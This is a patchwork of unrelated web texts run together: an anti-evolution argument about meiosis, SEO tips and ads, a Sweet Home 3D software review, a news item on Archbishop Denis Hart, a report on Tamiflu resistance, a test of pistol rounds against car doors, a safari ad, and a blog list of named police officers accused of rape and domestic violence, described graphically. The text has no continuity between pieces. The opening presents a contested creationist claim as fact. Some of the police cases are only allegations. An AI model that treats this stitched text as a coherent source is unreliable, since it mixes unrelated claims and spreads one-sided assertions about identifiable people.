The origin of sex remains a mystery for those committed to a purely materialistic view of reality -- not to mention the origin of the incredibly complex meiotic process that makes sex possible , or the intricate development of the embryo ( which is itself an engineering marvel ) .
At conception , the chromosomes inherited from the sperm are paired with the chromosomes inherited from the egg to give the new organism its full chromosomal complement .
Naturalists would have us believe that undirected occurrences brought about this marvelously interdependent process of ( 1 ) halving the genetic information ; ( 2 ) recombining it through sexual reproduction .
Not only is such a sophisticated mechanism required for the production of a sperm or egg cell via meiosis , but another equally intricate process also joins the genetic information during fertilization in order to produce the zygote ( which will later become the embryo ) .
To believe that purely materialistic processes , governed by the laws of chance , could have produced such a mechanism stretches credulity beyond reasonable limits .
We are sharing 3 basic tips that will not increase your article visibility but also drive more traffic to your website .
1. Write a meaningful & brief description
It ’s important to write meaningful and brief description about your article , most readers skip the article if they do not like your article description .
Do n’t write the stories you have just 300 characters to describe your article .
Do not use same description on your all articles , it creates the duplicity .
2. Keywords are important
You might be wondered to know keywords play important role in finding your article to readers and search engines .
Always write accurate keywords and avoid keyword stuffing .
You can get keywords from your article contents or you can think yourself what user will search to find your article .
3. Submit to social bookmarking sites
We recommend you should submit your site to social bookmarking sites such as Twitter , Digg , Reddit , Yahoo !
Buzz , Stumble Upon etc .
With few minutes of work you can not only promote your article easily but also drive good amount of traffic on your website .
For your easiness we have put sharing links at top and bottom of each article .
By applying above 3 simple tips you will achieve great results .
Be Sociable , Share !
Sweet Home 3D : Open Source , Cross Platform Design Application
by Ostatic Staff - Aug. 05 , 2009
If Vern Yip is reading this , I still need your help .
Though Sweet Home 3D tops Google 's SketchUp in a number of areas , it 's still not much help for someone with no design sense .
This makes it even more odd that I was so excited when I spotted Elizabeth Krumbach 's post on the open source , cross platform 3D interior design modeling application .
I 've lived in my house for nine years -- we have shades on all the windows , but only one window has actual curtains .
It 's just that SketchUp is a fun little application , and it's one of the only applications I 've tried to run with WINE ( and failed miserably in the attempt ) .
Sweet Home 3D , as Krumbach says , is pretty simple once you get the hang of it .
Because it 's open source , there 's the potential to model a structure ( and the stuff that fills it ) to a whole new level of precision .
Perhaps the only drawback ( and it could be a machine quirk , as everything 's being difficult today ) was its seeming somewhat crashprone on my Ubuntu 9.04 64 - bit laptop .
That could also be chalked up to my learning curve .
But let 's take a closer look .
The key thing to keep in mind with Sweet Home 3D is that zoom is as useful as any of the building tools .
Walls , rooms , half walls , and furniture can be set at any angle ( and the angles and dimensions are calculated as the structure is laid out ) .
Hints pop up when a particular tool is selected ( such as " Create wall " or " Create rooms " ) , but all generally work the same way .
Personality can be added to structures by selecting the desired item , and changing color , texture , or height and slope .
But it 's really all about the three dimesional walk throughs .
Sweet Home 3D has two methods of 3D viewing : aerial and a " virtual visit . "
The " virtual visit " mode is an eye - level view , controlled by selecting the small figure in the 2D pane and turning and moving him .
( I tend to do this slowly , and imagine him fearfully expecting something to jump out from under the oversized corner sectional couch . )
For best results , Sweet Home 3D developers recommend that your system ( both hardware and software ) is capable of handling fairly intensive 3D rendering .
The application can take " photos " of a room in its 3D state , and is able to export plans to PDF ( or simply print them ) .
Importing items of furniture can be done in - program ( and the application can handle files in the OBJ , LWS and 3DS formats for those wishing to create and contribute objects ) .
Sweet Home 3D runs on Windows , OS X , Linux and Solaris , and can be launched via Java Web Start or by an installer .
Since it is licensed under the GPL , the source code is also available for those wishing to take a closer look .
Manually create 70 pr9 high authority dofollow SEO pr ... Level 1 $ 5
Hello sir ,
You can find the perfect Service !
In this Service , I will ...
THE Catholic archbishop Denis
Hart told a woman abused by a priest to " go to hell , bitch " in conduct which a magistrate labelled appalling .
Archbishop
Hart later apologised to the woman in the Melbourne Magistrates Court for what the magistrate , Anne Goldsbrough , described as " appalling words of abuse " .
But last night Archbishop
Hart repeatedly claimed he '' did not recall ' ' his comments or being rebuked by the magistrate in mid-2004 .
'' It was a number of years ago .
I do n't recall precisely , '' he told the Herald .
When it was put to him that he would surely recall the comment because it had become an issue in court , he again said : '' I do n't recall ' ' .
Court documents confirm the archbishop 's outburst after he was granted an intervention order against the woman , who had pursued him over her abuse by a priest , Barry Whelan , in 2001 .
Hey , even in Quidditch you want to leave the match the victor .
Indiscriminate use of antiviral medications to prevent and treat influenza could ease the way for drug - resistant strains of the novel H1N1 virus , or swine flu , to emerge , public health officials warn -- making the fight against a pandemic that much harder .
Already , a handful of cases of Tamiflu - resistant H1N1 have been reported this summer , and there is no shortage of examples of misuse of the antiviral medications , experts say .
People often fail to complete a full course of the drug , according to a recent British report -- a scenario also likely to be occurring in the U.S. and one that encourages resistance .
Stockpiling is rife , and some U.S. summer camps have given Tamiflu prophylactically to healthy kids and staff , and have even told campers to bring the drug to camp .
Experts anticipate more problems in the fall as children return to school and normal flu season draws nearer .
“ Influenza viruses mutate frequently and any viral resistance could be acquired easily , ” said Dr. Anne Schuchat , director of the National Center on Immunization and Respiratory Disease at the Centers for Disease Control and Prevention in Atlanta .
“ It wo n’t surprise us if we see resistance emerge as a bigger problem in the fall or in the years ahead . ”
Advertisement
Prescribed in pill form , Tamiflu ( oseltamivir ) works by preventing the flu virus from leaving infected cells and spreading to new ones .
Because a vaccine against pandemic H1N1 influenza will not be widely available for several months , Tamiflu and to a lesser extent Relenza ( zanamivir ) , an antiviral that acts similarly , are key medical tools for fighting the pandemic in the meantime .
On Friday , however , the World Health Organization advised doctors that even those who are sickened with swine flu do not need to be given Tamiflu or Relenza if they are only mildly or moderately sick and are not in a high - risk group ( such as children under 5 , pregnant women and those with an underlying health condition ) .
Both drugs can help prevent illness in people exposed to the virus and reduce illness severity in people already sickened with it .
On Aug. 14 , after U.S. national soccer team forward Landon Donovan was diagnosed with H1N1 flu , players , coaches and support staff of the U.S. and Galaxy teams were advised to take Tamiflu as a preventive measure .
Tamiflu was chosen a few years ago for stockpiling by the federal government to deal with future pandemics .
Advertisement
Health authorities in the United States and elsewhere are keeping a sharp eye on prescriptions of the drug as they prepare for a surge of H1N1 cases in the fall .
The U.S. government has issued detailed guidelines on prescribing antivirals .
But health professionals may not follow the recommendations or may give in to patients who pester them for prescriptions that are ill - advised , said Dr. Robert Schechter , acting chief of the immunization branch of the California Department of Public Health .
“ These medicines can be very helpful to those who could get very sick , ” Schechter said .
“ But excessive use will accelerate the development of resistance and lead to the lack of a medication for everybody . ”
Anxiety over indiscriminate use is growing , and taking the medications cavalierly is not without consequence .
British health authorities reported Aug. 2 that cases of side effects from Tamiflu had doubled in the prior week , coinciding with the July 24 launch of a program in England to provide antivirals to anyone with H1N1 influenza who requests it over the phone or online .
In the first three days of the program , 150,000 packets of Tamiflu were dispensed and 293 cases of side effects were reported .
Tamiflu can cause vomiting , diarrhea and mild neuropsychiatric effects .
Advertisement
Some U.S. health authorities have also expressed concern over misuse of the medications .
Last month , the CDC urged directors of summer camps to stop handing out Tamiflu to healthy campers .
Americans are known to hoard antivirals : A 2006 study showed that heightened anxiety over a possible avian flu pandemic caused Tamiflu prescriptions to soar 300 % in 2004 and 2005 .
Just as with antibiotics , of central importance to antivirals ’ success is taking them properly , including completing the recommended course .
However , a study published in late July found poor adherence among children in London who took Tamiflu for prevention of pandemic H1N1 in the spring .
Advertisement
Less than half of the grade - school - age children and only 76 % of the 13 - and 14 - year - old students completed a full course of medication .
More than half of the children reported side effects , such as nausea , stomach cramps and trouble sleeping .
Almost one in five reported a neuropsychiatric side effect , such as poor concentration , confusion or bad dreams , even though the U.S. Food and Drug Administration says neuropsychiatric side effects are rare .
Moreover , a study published this week found that Tamiflu and Relenza are unlikely to prevent complications , such as asthma flare - ups or ear infections , in children who have seasonal influenza .
But they do increase the risk of vomiting .
The authors of the study , published in the British Medical Journal , said they do n’t know if their findings can be generalized to the pandemic flu strain .
Advertisement
Antiviral drugs can be underutilized as well as overused , Schechter said .
Some Californians who have died from novel H1N1 influenza did not receive antivirals .
“ I ’m afraid the medications are not being used in some instances where they should , ” he said .
“ But there are also international reports of resistance developing .
Both of those extremes are concerning . ”
A handful of resistant H1N1 cases have been reported worldwide among people who had taken Tamiflu preventively : three in Japan , and one each in Canada , Hong Kong and Denmark .
Those cases are not surprising nor of great concern to health authorities , said Dr. Tim Uyeki , a medical epidemiologist with the CDC .
They are cropping up sporadically and do n’t seem to be spreading from person to person .
Advertisement
“ The most important question for public health is not whether sporadic cases occur but whether there is ongoing transmission of oseltamivir - resistant strains , ” Uyeki said .
The most perplexing case of Tamiflu resistance arose in June when a San Francisco teen who had flown to Hong Kong was found by authorities there to be ill with pandemic H1N1 flu .
The girl , who recovered , had never taken Tamiflu .
A state investigation of people who were in close contact with the girl , as well as tests of 251 H1N1 virus samples from sick patients in California , has not turned up evidence of a resistant strain circulating here , Schechter said .
But nothing , in theory , would stop such a strain from developing , then circulating .
In recent years , several strains of regular , seasonal H1N1 influenza have developed resistance to antiviral medications .
Advertisement
And a study published in March on the spread of the H5N1 avian flu , which has been circulating worldwide in bird flocks in recent years and has killed 262 people , showed the virus rapidly developed resistance to a different class of antiviral drugs , adamantanes .
“ With bird flu , we found some resistance started in China and spread throughout the world in a few years , ” said study author Daniel Janies , an evolutionary biologist at Ohio State University .
“ Overuse contributes to resistance .
Basic natural selection predicts it .
We can demonstrate why you should not use these drugs unless you have to . ”
Other antiviral drugs exist , but the pandemic H1N1 virus is resistant to the adamantane class .
If it develops resistance to Tamiflu also , only Relenza would be left to treat the illness , barring the development of new antiviral medications .
Relenza , Schechter said , is indicated only for ages 5 and older .
Used less commonly than Tamiflu , it is inhaled as a powder , and people who are seriously ill or have difficulties with breathing cannot take it .
Advertisement
“ The more choices you have , the better for treatment , ” Schechter said .
“ To lose any one of those options would pose great challenges for treatment of those who are most vulnerable or likely to die . ”
--
Grahame L. Jones contributed to this story .
shari.roan@latimes.com
Advertisement
grahame.jones@latimes.com
A lot of officers have been trained to conduct a high risk stop behind the “ cover ” of their door , leaving it open while they kneel behind it with their weapon drawn .
This seems like a very logical tactic , but as you are about to see , it actually does n’t work in the real world .
Notice that the pictures are taken from farther away this time .
This is a safety precaution .
Shooting a car is a fun thing to do , but it can be VERY dangerous and NOTHING should be taken for granted .
ALWAYS err on the side of safety , ESPECIALLY when you are shooting at the metal parts of the car .
The first weapons used on the driver door is a 9 mm and a .40 S&W .
Three rounds of 9 mm ball ammo and .40 S&W ball ammo each were fired into the driver ’s side door to see what sort of protection the door offered against them .
The results .
Not much protection at all .
Now this Buick ’s door was much tougher than many car doors I have seen simply because the windows and locks were all power units .
The motors for these functions and the extra parts inside the door mean that there is more hard stuff for a bullet to hit .
The skin of the door is usually a thin sheet metal , but inside the door are stamped steel frames and support beams in addition to parts for the window elevator , motors , door latch , etc .
Those can all add up to stop a bullet , but as the above photos show , they are hardly a guarantee of protection .
In this shoot despite all those things being in the way , ALL the pistol rounds fired penetrated through the driver ’s door into the passenger compartment , with most lodging somewhere in the passenger door .
The odds of a pistol round penetrating through both doors of a vehicle are pretty small .
Because of all the factors previously mentioned PLUS the addition of the various pieces of the interior that can be hit , it is extremely unlikely that a pistol round will penetrate both doors .
Still , it can happen , as this .40 round came close to demonstrating .
More on that later .
Now , my Sig P220 is up to bat again .
Notice how tight my group is
And the results .
As the instructor put it …
“ And there ’s the .45 … F*cking flying ashtray ”
Notice again that the bullets are profoundly effected by being fired through the car door .
They are keyholing , fragmenting , and carrying lots of secondary projectiles ( bullet jackets , glass , plastic , metal , etc ) with them into the target .
The truly odd thing here as opposed to the laminated glass is that the bullets seem to stay more or less on the path they are on when they hit the door , not deflecting like they did with the laminated glass .
And as you can see in the photo , the fact that the bullets did not penetrate the passenger door is of little comfort if you are inside the vehicle …
What about the door window glass ?
Utterly inconsequential ballistically .
Anything will shatter it without causing any bullet damage , even a .22 .
To demonstrate the difference here , a 60 grain .22 LR fired from inside the vehicle wo n’t even penetrate the windshield .
That same round can pass through BOTH side windows without even slowing down .
Again the question must be asked …
What happens if you pepper roughly the same area with several rounds ?
Again , the 9 mm is called in to see what happens .
Here ’s the results .
Pay particular attention to what happens on the other side of the passenger door .
Yup !
Penetration .
Lessons learned :
1 . A single car door offers NO protection against handgun rounds .
2 . Even two car doors and the passenger compartment offer little protection , and even that protection can be expected to evaporate when multiple rounds are fired .
Planning a luxury safari to Africa does not need to be over whelming ...
Sound & expert advice on when and where to travel is vital .
African Travel Gateway has been creating and managing African Safaris , holidays and adventures for over 20 years .
We compile excellent itineraries that encompass all travel arrangements including safaris , lodges , hotels , transfers , car hire , flights and activities .
Our deep knowledge of travel to Africa , coupled with our extensive experience makes us the tour operator of choice !
Travelling with African Travel Gateway assures you of :
Experienced and innovative consultants
Very competitive rates
Financial Protection
Full tourism industry insurance compliance
Over 20 years of African safari experience
On the ground support
From luxury train travel in South Africa , to time stopping moments on safari in places like Okavango Delta , Kruger National Park or on a Chobe Houseboat , African Travel Gateway goes above and beyond in preparing the African Holiday of a lifetime !
Booking a trip with African Travel Gateway entails the following :
1 ) We create the itinerary that suits you
2 ) You agree to our Terms & Conditions
3 ) We book & confirm the trip in full
To start planning your African safari .
( JavaScript must be enabled to view this email address ) to get the ball rolling !
Trigger warning .
This post includes narrative descriptions of sexual violence , sexual coercion , assaults , stalking , and harassment by police officers against women , men , and children , including several cases of extreme violence .
It may be triggering for past experiences of sexual assault .
It is certain to be extremely grim reading for anyone .
All of these news stories appeared in my feed reader at some point within the past month and a half .
There are actually about four or five more on my list that I could have included ( mostly domestic violence assaults ) , but I had to give up because I ’ve been working on this for about twelve hours now and I cannot stand to type up even one more case tonight .
1. Officer Thomas Tolstoy , Philadelphia , Pennsylvania .
( Cont’d . )
You may remember Officer Thomas Tolstoy , the serial rapist on Officer Jeffrey Cujdik ’s elite narco - police shake - down squad , who , besides participating in repeated evidence - less paramilitary drug raids , also repeatedly took the opportunity to pull women aside during these hyperviolent home invasions and sexually assault them .
The police department ’s response to three independent complaints from April 2008 to February 2009 was to temporarily place Tolstoy on desk duty ( from October 2008 to January 2009 ) , then put him back on the street to do more drug raids with Cujdik .
The other stories about Cujdik ’s wolfpack appeared in local newspapers in March 2009 ; Tolstoy was finally put back on desk duty in May 2009 .
Meanwhile , while Tolstoy is rewarded for his sexual assaults with an easy desk job , he continues to receive not only his regular salary of $ 57,800 , but also thousands of dollars in overtime pay for sitting his ass on a court - house bench while the DA extends subpoenas on tainted drug cases in which he will almost certainly never testify .
The bill for maintaining Tolstoy in the lifestyle to which he has become accustomed will , of course , be sent along to Philadelphia taxpayers , including Tolstoy ’s three known victims .
Deputy District Attorney John Delaney explains that the D.A. ’s office continues to issue these money - wasting subpoenas on dead - end cases because
We want to maintain the status quo .
No doubt .
2. Police Chief Michael Classey , Atlantic Beach , Florida .
The city government in Atlantic Beach , Florida hired a lawyer , allegedly to investigate charges that chief Michael Classey had forced unwanted sexual contact on a female officer , Renee Jackson , who works sex crimes for the department .
Instead , the lawyer put together a legal brief to defend the city from a lawsuit for sexual harassment — a charge that Jackson never made .
Both the Jacksonville Sheriff ’s Department and the Florida Department of Law Enforcement have refused to investigate the charges .
Professional courtesy , I guess .
3. Deputy Gary C. Handley , Rogers County Sheriff ’s Office , Rogers County , Oklahoma .
Earlier this month , Deputy Gary C. Handley turned himself in to face charges on one county of sexual battery for forcing unwanted inappropriate touching on a female courthouse employee .
4. Officer Jeffrey John Sung. San Francisco Police Department .
San Francisco , California .
Earlier this month , veteran San Francisco motorcycle officer Jeffrey John Sung plead not guilty to charges for sexual battery and false imprisonment without violence [ sic ] for grabbing a female friend in her home , forcing unwanted groping on her while he talked about having sex with her , and refusing to let her leave when she tried to get away .
When the victim managed to break free and call a relative for help , he ran away and left on his government - issue police motorcycle .
Sung ’s lawyer has told the media that it was a misunderstanding of sorts .
5. Officer Roberto Pagan .
Staten Island , New York .
Roberto Pagan , a patrol cop working for city government police on Staten Island , was suspended without pay last week after he started choking his girlfriend and then punched her in the eye during an argument on a public street .
He has been suspended without pay and is facing misdemeanor charges ; since he is a cop , this batterer was released on his own recognizance pending trial .
6. Officer Johnnie K. Hicks .
Newport News , Virginia .
Last week , Johnnie K. Hicks , a cop working for the Newport News city government ’s police force on the South Preinct High Impact Patrol Unit , was arrested for assaulting a woman in her home around 2:00 am and brandishing a gun .
While the Incident is being Internally Investigated by his coworkers , Hicks is being given a paid vacation at taxpayer expense .
7. Deputy Brian Gillespie .
Broward Sheriff ’s Office .
Oakland Park , Florida .
Last week , Deputy Brian Gillespie , a cop patrolling turf in Oakland Park , Florida for the Broward County government ’s sheriff ’s office , was arrested and charged with domestic violence battery after he grabbed his wife ’s arm during an argument , in order to force her not to leave the house without his permission , and then punched her several times and threw her down two steps onto the floor .
This dangerous batterer has been given a paid vacation , at taxpayer expense , while under investigation , and was released from jail on a $ 250 bond .
8. Chief Deputy David E. Gidley .
Tucker County Sheriff ’s Department .
Tucker County , West Virginia .
Earlier this month , while he was on duty and in police uniform , Chief Deputy David E. Gidley , a cop working for the Tucker County government ’s police force , drove out in his police car to confront his estranged wife ; in the course of an argument , he grabbed her by the arm hard enough to leave marks , and then chased her around her car while waving his ASP tactical baton and beating on her car with it .
Unhinged wife - beater Chief Deputy David Gidley has been arraigned on misdemeanor assault and domestic battery charges , and has been released on a $ 600 personal recognizance bond .
9. Police Chief Robert Peterson .
Maysville Police Department , Maysville , Oklahoma .
Earlier this month , the Maysville city government decided to fire boss cop Robert Peterson , the chief of their government police force , after witnesses ( including two fellow cops ) saw him slap his girlfriend in the face during an argument outside of their apartment .
10 . Police Chief Anthony Batts .
Oakland Police Department .
Oakland , California .
In California , on the other hand , city governments do n’t even maintain those minimal standards .
Anthony Batts , formerly a cop working for the Long Beach city government ’s police department , had at least four crime reports taken against him for domestic violence charges in the cities of Long Beach , San Pedro , and San Diego .
At one point he gave his then - wife , Laura Richardson - Batts , a black eye ; she later sought refuge in a friend ’s house to get away from him .
That did n’t stop Batts from being promoted by the Long Beach city government to chief of police , and once he was , he put the domestic violence reports under lock and key in the police chief ’s office and altered reports to conceal their contents .
Other cops working under him kept copies of the originals and used the reports to blackmail Batts to insulate themselves from disciplinary actions during a scandal over unprofessional conduct and retaliation and vandalism against whistleblowers within the department .
Batts ’s domestic violence history has caused him problems in securing FBI security clearances and in maintaining his permit to carry a firearm .
None of which , of course , has stopped the corrupt wife - beater Anthony Batts from being named chief of police for the city government in Oakland , California .
11 . Officer Ronald Montgomery .
Tulsa Police Department .
Bixby , Oklahoma .
Officer Ronald Montgomery , a cop working for the Tulsa city government ’s police force , was arrested earlier this month for allegedly beating his wife and pointing his government - issued gun at her during an argument in front of their infant son and 8 - year - old daughter .
His wife went to the hospital with bruising and swelling to her arm and wrist ; Officer Ronald Montgomery claims that he had not touched her during the argument .
This dangerous batterer , who beat a woman and pointed a loaded gun at her during an argument , is currently roaming free on $ 11,500 bond .
12 . Police Officer Sam Parker .
Lafayette Police Department .
Lafayette , Georgia .
Sam Parker , a cop formerly working for the Lafayette city government ’s police force , is currently on trial on charges he abducted and murdered his ex-wife , Theresa Parker .
The story this past Friday was that a former coworker , a Lafayette cop named Stacey Meeks , testified that Officer Sam Parker spent years openly bragging about killing people while on the job , and kept trophies to show off from people he had killed , such as the lethal bullet and crime scene photos from the killing .
According to Meeks , Officer Sam Parker also carried a loaded weapon to the Grand Jury and said he planned to go out in a hail of bullets rather than get arrested if the jury voted to indict .
After another Incident in 2003 where Officer Sam Parker fired off his gun on the job , several shrinks ruled him homicidal ; Officer Sam Parker bragged about that with his coworkers , too .
He also repeatedly watch Officer Sam Parker use chokeholds to take people down while on the job .
None of this deranged , attention - seeking , hyperviolent behavior seems to have endangered his position with the Lafayette city government ’s Police Department , or to have caused any legal consequences whatsoever for Officer Sam Parker ; I would n’t be surprised if he expected no more consequences when he went on to murder his wife .
13 . Officer Jared Rohrig , Orange Police Department , Orange , Connecticut .
In Milford , Connecticut , Officer Jared Rohrig , a cop working for the Orange city government ’s police force , posed as his twin brother Joe to deceive his girlfriend into having sex with him .
She realized while they were having sex that he was n’t Joe , and tried to get up and leave , so he grabbed her by the arms , threw her down , and forced her to continue having sex with him while she cried and struggled to push him off of her .
The woman reported the rape to the government police three days later ; Rohrig was given a paid vacation from his job starting the next day pending the result of an Internal Investigation .
14 . Officer Matthew Raymond , Eliot , Maine .
In Maine , Officer Matthew Raymond was allowed to take a two - month - long paid vacation ( to keep getting paid while using up vacation and sick time ) before finally losing his job yesterday , so that he could continue to extract his $ 45,000 / year regular salary from perfectly innocent Eliot taxpayers , while awaiting trial on charges of domestic violence stalking against his ex-lover .
Besides common stalking behaviors like showing up constantly at her hous , tracking her whereabouts , and incessantly calling her wherever she went , Officer Matthew Raymond also specifically used his legal privileges as a police officer to intimidate her and facilitate the stalking .
After she moved out and went to live in another town to get away from him , he parked his marked police cruiser outside her house at least 68 times within a two - month period .
He also used his police car , and his legal powers of detention and arrest , to force her to pull her car over so that he could ask her to come back to him .
15 . Officer Jeffrey Luff . Bakersfield Police Department .
Bakersfield , California .
Last month , Officer Jeffrey Luff was arrested and charged with misdemeanor battery and misdemeanor sexual battery committed while in uniform and on duty .
He went out on a call to break up a loud party , which turned out to be a lingerie party ; he then drove out to an after - party later that night and picked up two women there who he offered to drive back to where the first party had been .
Then he took opportunity to grab one of the women ’s buttocks and genitals without her permission .
16 . State Trooper Derek S. Snavely , West Virginia State Police , Jefferson West Virginia .
Last November , State Trooper Derek S. Snavely pulled a woman on a chickenshit traffic stop ( the claim is that she was driving left of the center line ) .
He used the threat of a bogus DUI arrest ( which would have cost the woman her job ) and getting her car towed to detain her , force her to kiss him and unbutton her blouse , and then take him back to her house , where he repeatedly raped her .
The story ’s in the news now because his victim recently filed a civil - rights lawsuit after State Police Internally Investigated the Incident and the government prosecutor decided — in spite of records from home surveillance cameras and text messages sent by Trooper Derek S. Snavely to his victim ’s cell phone — not to press any criminal charges .
17 . Unnamed officer .
Dunbar Police Department , Dunbar , West Virginia .
A woman in her 20s has come forward , through a public statement from her lawyer , with allegations that a police officer working for the Dunbar city government ’s police force used intimidation and the threat of legal charges to force her to have sex with him , after pulling her over on a routine traffic stop .
( She had been caught driving on a suspended license before the stop .
The cop threatened her with charges on the traffic violations unless she would have sex with him , and then drove her to a dark remote location , where she was afraid for her safety not to comply . )
The city government refuses to confirm whether or not the police force is investigating the report .
As it happens , Sergeant R. O. Conley is currently on administrative leave with pay for an indefinite period , which is to say a mandatory paid vacation , but the city government refuses to say in public whether or not Conley is the cop accused of the rape .
18 . Unnamed deputy .
Bexar County Sheriff ’s Office .
San Antonio , Texas .
Earlier this month , n unnamed Bexar County sheriff ’s deputy used his uniform and gun to pull a woman aside while she was walking down the street on the south side of San Antonio .
He claimed ( falsely ) that she had an outstanding warrant for her arrest , and ordered her to get into his patrol car .
Then he drove back to her house and then he grabbed her by the neck and forced her to have sex with him .
As of the most recent news reports I could find ( from about a week ago ) , the survivor had bruises around her neck , had been hospitalized for her injuries , and was being treated in a hospital psych ward for post - traumatic stress .
The deputy , who was caught naked on the survivor ’s couch by the San Antonio city government ’s police , claims that the sexual relationship was consensual .
So far , the San Antonio city government has filed no charges against the rapist deputy , although his own bosses at the Bexar County government ’s Sheriff ’s Office have forced him to take a vacation from his job while he is under investigation .
19 . Deputy Donald A. Harder III .
Saratoga County Sheriff ’s Office , Edinburg , New York .
Last week , Deputy Donald A. Harder III , a cop working for the Saratoga County government ’s Sheriff ’s office , was released on $ 25,000 bond after being arrested for forcing sex on a 27 - year - old woman in his patrol car while on duty on a patrol car , armed , and in full police uniform .
According to the Sheriff ’s office , his victim believed she had to comply [ with his demands for sex ] because she was in the vehicle and he was in uniform . .
Before raping women on the Saratoga County government ’s police force , Deputy Donald Harder was a Marine working for the United States in its invasion and occupation of Iraq .
20 . Officer Cleveland Reynolds .
Birmingham Police Department , Birmingham , Alabama .
Last month in Alabama , Cleveland Reynolds , a cop working the 11 p.m. to 7 a.m. patrol shift for the Birmingham city government ’s police force , was arrested for repeatedly raping a 23 year old woman while he was out on duty .
Pending the outcome of the trial , Reynolds is being given a paid vacation at taxpayer expense .
21 . Officer Perry Young .
Birmingham Police Department , Birmingham , Alabama .
Also last month in Alabama , Officer Perry Young , a patrol cop who formerly worked for the Birmingham city government ’s police force , finally went to jail for forcing a 19 - year - old woman to have sex with him while he was on duty , armed , and in uniform , after he used his legal powers to force her into his custody and took her to a remote location to force sex on her .
22 . Deputy Jonathan Bleiweiss .
Broward Sheriff ’s Office , Oakland Park , Florida .
In addition to wife - beater Deputy Brian Gillespie , the town of Oakland Park , Florida is also patrolled by serial - rapist Deputy Jonathan Bleiweiss , who repeatedly used his uniform and his legal privileges as a government police officer to target Latino men on routine traffic stops or bike stops , roust them out of their cars or off their bikes , force them to show identification , and then , if he found that they were undocumented immigrants — therefore legally vulnerable easy targets — threw them down against his patrol car , forced them to submit to frisking , grabbed their penises during the search , propositioned them in Spanish , and then forced them to have sex with him in his patrol car under the threat of being arrested or reported to ICE for imprisonment and deportation .
He repeatedly demanded phone numbers after raping the men in his custody , which he would later use to stalk his victims and try to arrange future encounters .
Bleiweiss is known to have assaulted at least eight different undocumented Mexican and Salvadorean immigrants ranging in age from 17 to 30 years old .
The Internal Investigation into Bleiweiss ’s targeting of legally vulnerable men for serial rape began in early April when the boss of one of the victims approached police with a report — but Deputy Jonathan Bleiweiss was allowed to continue patrolling his regular turf for three more months while under investigation , during which time ( beginning April 23 ) he repeatedly assaulted and later stalked at least one more undocumented Mexican immigrant who he had hunted down while out on patrol .
Deputy Jonathan Bleiweiss was finally moved to a desk job and then later suspended without pay in July .
His boss , Broward Sheriff Al Lamberti , says they were giving an accused serial rapist on active patrol duty the benefit of the doubt until they completed their investigation .
The case is likely to be difficult for government lawyers to prosecute because Deputy Jonathan Bleiweiss deliberately targeted undocumented Latino immigrants for his serial rapes ; his lawyer has already used their undocumented status to smear the victims in court , and given that all of the victims face a standing threat of being arrested , imprisoned , and deported by the United States government ’s federal immigration cops if they come into contact with the government criminal justice system , [ many of the victims have been extremely reluctant to come forward to the government police or to testify in a government court ] ( ( http://www.sun-sentinel.com/news/broward/sfl-bso-deputy-arrested-sex-abuse,0,1484852.story).
23 . Officer Billy Ray White .
Louisville Metro Police Department , Louisville Kentucky .
In 2006 , serial rapist Officer Billy Ray White , of the Louisville Metro Police Department , was found guilty of raping a woman at gunpoint in front of her 9 month old daughter of threatening to kill her if she reported it , and of using the threat of jail to coerce sex from another woman that he had arrested .
The story is in the news again because an appeals court judge recently threw out Billy Ray White ’s conviction and ordered a new trial , on the grounds ( 1 ) that the coerced sexual relationship with a woman he had arrested , conducted under the threat of imprisonment , was in some sense of the word consensual (? ) and so different enough from the forcible rape that the joinder of the cases as impermissibly prejudicial , and ( 2 ) that the trial judge should not have allowed testimony from several women about Officer Billy Ray White ’s repeated and insistent use of his badge and uniform to stalk and try coerce sex from them after an arrest .
According to Honorable government judge Thomas B. Wine , evidence that the Officer Billy Ray White , a heavily - armed , legally - privileged enforcer for the state , while acting in uniform and under color of authority over women under his legal power , was constantly on the prowl to use his uniform in furtherance of his lust , has little probative value in determining whether or not the man had a propensity to force sex on unwilling women .
As a result of the reversal of the conviction , the new trial judge , rather than scheduling a trial date , told the government prosecutor to cut a plea bargain with White ; they eventually agreed that this serial - rapist would cop a plea , get sentenced to time served , and get back out on the street .
24 . Officer Julian Steele , Cincinnati , Ohio .
In Ohio , Cincinnati city government cop Julian Steele falsely arrested and imprisoned a teenage boy while investigating a robbery .
Then he used this bogus imprisonment to force the boy ’s mother to have sex with him in order to get her boy released from jail .
Remarkably , the county government is actually calling this exactly what it is by charging Steele with 10 felony counts including abduction , extortion , sexual battery and rape .
25 . Officer Jesus Sanchez and the Lorain Police Department .
Lorain , Ohio .
A woman named Sarah Long recently came forward with a lawsuit against the city government governing Lorain , Ohio after the city government and its hired police department repeatedly ignored complaints that Officer Jesus Sanchez , a 28 - year veteran cop working for their police force , repeatedly forced kisses on her , groped her , stalked her , made phone calls every day threatening her safety , and used the power of his badge and his legal privileges as a police officer to force her to pull over her car and deal with him 15 to 20 times .
When Long complained about this pattern of harassment and the use of legal power to facilitate sexual violence , nothing happened ; when she finally forced the issue by talking to the federal government ’s Department of Justice and filing a civil lawsuit , Sanchez was charged with menacing by stalking .
After he was convicted , the penalty for singling out a woman for unwanted sexual contact , imprisoning her in her own home , and using police powers to make her constantly afraid for her safety was 60 days in jail .
During his trial , Sanchez ’s defense lawyer said that he had been disciplined … by Lorain police years ago for his stalking and sexual coercion — purely administrative discipline which , of course , resulted in no legal consequences whatosever for Sanchez for six years , until the lawsuit forced the issue .
Sanchez was allowed to retire from the police force after his trial in spite of his conviction .
The story is in the news again because Sanchez , and fellow retired cop Dennis Davis , recently filed statements in Long ’s lawsuit stating that pervasive harassment , sexual abuse and rape against women had been well - known and tolerated by the boss cops for years .
Sanchez himself stated in his affadavit that I have observed what I believe is a pervasive pattern of sexual misconduct by Lorain police officers committed while they are on duty .
The Department persistently ignored these reports .
I believed that nothing would happen to me as a result of my sexual advances ….
The primary reason I made sexual advances …. while on duty was my knowledge of the City ’s policy of tolerating such conduct and deliberate indifference toward such conduct by on - duty police officers .
Retired cop Dennis Davis stated in his affadavit that other cops working for the Lorain city government ’s police force repeatedly forced nonconsensual sexual misconduct on women while on duty and that It appeared to me that Lorain police officers engaged in this misconduct without receiving meaningful discipline to the best of my knowledge .
Boss cop Cel Rivera admitted that he had handled 30 complaints relating to non-consensual sexual contact involving a police officer and a third - party since he took the job in 1994 .
Court documents list numerous other incidents of alleged misconduct by other officers , including stalking , forced sexual encounters , armed threats and other behavior he contends shows a pattern of ignoring misconduct by Lorain police over the years .
26 . Officer Timothy Gerek , Jr. Lorain Police Department , Lorain , Ohio .
One of those cops working for the city government in Lorain was Timothy Gerek , Jr. , who was indicted in 2002 for beating and then raping his estranged wife in December 2001 .
